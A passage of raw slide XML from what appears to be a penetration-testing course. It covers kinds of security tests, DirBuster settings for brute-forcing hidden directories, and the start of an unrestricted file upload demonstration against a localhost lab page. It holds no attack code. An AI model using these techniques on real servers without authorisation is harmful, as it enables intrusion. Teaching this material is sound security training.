              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT"/>
              </a:rPr>
              <a:t>Double Blind</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="956520" y="2193840"/>
            <a:ext cx="649440" cy="649440"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="5A6FAD"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="231" name="CustomShape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1477080" y="3038400"/>
            <a:ext cx="7140600" cy="519480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="8D99C2"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="412560" tIns="71280" rIns="71280" bIns="71280" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT"/>
              </a:rPr>
              <a:t>Gray Box</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="232" name="CustomShape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1152000" y="2973600"/>
            <a:ext cx="649440" cy="649440"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="8D99C2"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="233" name="CustomShape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1477080" y="3817800"/>
            <a:ext cx="7140600" cy="519480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="BEC4D9"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="412560" tIns="71280" rIns="71280" bIns="71280" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT"/>
              </a:rPr>
              <a:t>Double Gray Box </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="234" name="CustomShape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1152000" y="3752640"/>
            <a:ext cx="649440" cy="649440"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="BEC4D9"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="235" name="CustomShape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1281600" y="4597560"/>
            <a:ext cx="7336080" cy="519480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="8D99C2"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="412560" tIns="71280" rIns="71280" bIns="71280" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT"/>
              </a:rPr>
              <a:t>Tandem </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236" name="CustomShape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="956520" y="4532400"/>
            <a:ext cx="649440" cy="649440"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="8D99C2"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="237" name="CustomShape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="853920" y="5376960"/>
            <a:ext cx="7763760" cy="519480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="5A6FAD"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="412560" tIns="71280" rIns="71280" bIns="71280" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT"/>
              </a:rPr>
              <a:t>Reversal</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="CustomShape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="528840" y="5312160"/>
            <a:ext cx="649440" cy="649440"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="5A6FAD"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="239" name="TextShape 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="152640"/>
            <a:ext cx="5790960" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="240" name="TextShape 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1752480"/>
            <a:ext cx="7619760" cy="4373280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="241" name="TextShape 16"/>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42" name="TextShape 17"/>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43" name="TextShape 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="8227080" y="5885640"/>
            <a:ext cx="1315440" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="45720" tIns="91440" rIns="45720" bIns="91440" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{C9C746AA-4123-4691-B7AE-8DAC0CA028EA}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Aria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457200" y="1447920"/>
            <a:ext cx="7772040" cy="4320720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>DirBuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t> is a multi threaded java application designed to brute force directories and files names on web/application servers. Often is the case now of what looks like a web server in a state of default installation is actually not, and has pages and 
applications hidden within. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>DirBuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t> attempts to find these.	
					[Reference : OWASP]
</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="455"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DirBuster</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="456"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57"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7B9176AC-5D5E-4A62-9677-B74D3773B298}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="458"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extShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1447920"/>
            <a:ext cx="7772040" cy="4320720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="460"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DirBuster (GUI)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="461"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62"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1E2916FD-E7BC-4543-9F9E-955B82B36E0C}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="463"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64"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extShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1447920"/>
            <a:ext cx="7772040" cy="4320720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="466"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Set our desired settings</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46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68"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41E04251-F3E7-4B5D-8CF1-F4D437DB3931}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="469"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70" name="Picture 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1503000"/>
            <a:ext cx="7772040" cy="482148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extShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152280"/>
            <a:ext cx="5790960" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>List of directories and files found</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="472" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="473" name="Picture 3"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="5035320" cy="3123720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="474" name="Picture 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3595680" y="2743200"/>
            <a:ext cx="5067000" cy="3595320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="475" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="1600200"/>
            <a:ext cx="1904760" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>List View</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="476" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533520" y="5105520"/>
            <a:ext cx="1904760" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Tree View</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="477" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5638680" y="1600200"/>
            <a:ext cx="837720" cy="304560"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln w="28440">
            <a:solidFill>
              <a:srgbClr val="5A5A5A"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="478" name="CustomShape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1905480" y="5181480"/>
            <a:ext cx="837720" cy="30456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457200" y="1447920"/>
            <a:ext cx="7772040" cy="4320720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="480"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Tick ‘Be recursive’ and change file extension to ‘html’</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="481"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82"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7AEC213E-6065-40E4-BA54-AD8DA17EFD5F}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="483"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84" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="380880" y="1219320"/>
            <a:ext cx="8305560" cy="510516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457200" y="1447920"/>
            <a:ext cx="7772040" cy="4320720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="486" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="152280"/>
            <a:ext cx="7772040" cy="1066320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Interesting file was found</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48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88"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7E3CC847-A602-40D8-8D92-43057886BE5F}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="489"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490" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="5105160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="491" name="CustomShape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276720" y="3581280"/>
            <a:ext cx="837720" cy="15192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extShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="228600"/>
            <a:ext cx="8457840" cy="4571640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Unrestricted file upload vulnerability</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="493" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4800600"/>
            <a:ext cx="6857640" cy="914040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="494"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95"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496"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B52DA346-E090-4B5A-93B6-BC340E6CCE75}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>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Shape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="152640"/>
            <a:ext cx="6400440" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Case 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>http://localhost/upload/upload1/lampiran.html</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="498" name="TextShape 2"/>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499" name="TextShape 3"/>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500"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0BF39704-1143-4EA1-B621-C2286B358B28}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="501" name="Picture 3"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145880" y="1752480"/>
            <a:ext cx="6242400" cy="437328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457200" y="-76320"/>
            <a:ext cx="5790960" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Success!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="503" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
